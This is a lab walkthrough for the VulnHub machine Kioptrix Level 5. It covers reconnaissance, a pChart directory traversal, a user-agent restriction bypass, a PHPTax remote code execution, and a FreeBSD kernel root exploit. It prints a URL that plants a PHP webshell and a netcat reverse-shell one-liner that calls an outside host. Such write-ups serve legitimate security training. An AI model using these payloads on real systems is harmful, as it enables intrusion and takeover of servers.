Kioptrix Level 5 — VulnHub
Introduction:
Hello everyone. In this post, i’ll be sharing my walkthrough for Kioptrix Level 5 which is the last box in the kioptrix series from vulnhub. It was an easy box. We gain foothold from Directory Traversal and RCE and get root by kernel exploitation. Let’s start.
Enumeration:
Starting off by nmap scan, we get two ports open, 80 and 8080.
Navigating to web on port 80, we get page saying it works.
Now, navigating to web proxy on 8080, we get a 403 response.
Now, looking the source page on port 80, we get url path in html comment.
Searching for the vulnerabilities in pchart2.1.3 version, we get a directory traversal poc on exploitdb.
Using the above POC, i started fuzzing for any configuration files using the LFI linux wordlist from seclists.
We get some sensitive files but they didn’t had something useful for foothold. So, i started looking for web server’s config file. As we know the webserver is apache and the os is freebsd. So, searching in the freebsd documentation, i got the server config path.
Looking at the config file, we get the idea why it’s restricting us to access the page. It’s because of the user agent. It says only allow user agent that start with Mozilla/4.0 and deny request from every other user agent.
So, i went to the proxy options in burpsuite and added the new setting to replace Mozilla/5.0 with 4.0 in every request and sucessfully get the forbidden page on 8080.
Foothold:
Searching about we get that it is a free program to do US income taxes calculation and it is vulnerable to RCE. I got an exploit on exploitdb. All it was doing was writing a php webshell on the server through field and value, http get parameters.
So, i did the same manually and got rce.
http://IP:8080/phptax/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3Ehttp://IP:8080/phptax/data/rce.php?cmd=id
Then, using the revershell payload from payloadallthethings repo, i sucessfully get a shell on the machine.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f
Privilege Escalation:
Enumerating the machine, we didn’t had python so, i could not sabilize my shell. There wasn’t anything particular useful in the file system. So, i looked at the kernel version. It was freebsd 9.0 release.
Searching for the any potential kernel exploit, i successfully got one. Since, we did not have curl or wget on the box so, used to the netcat to transer the exploit in the box.
Compiling and executing the exploit, we successfully get root.
Thanks.
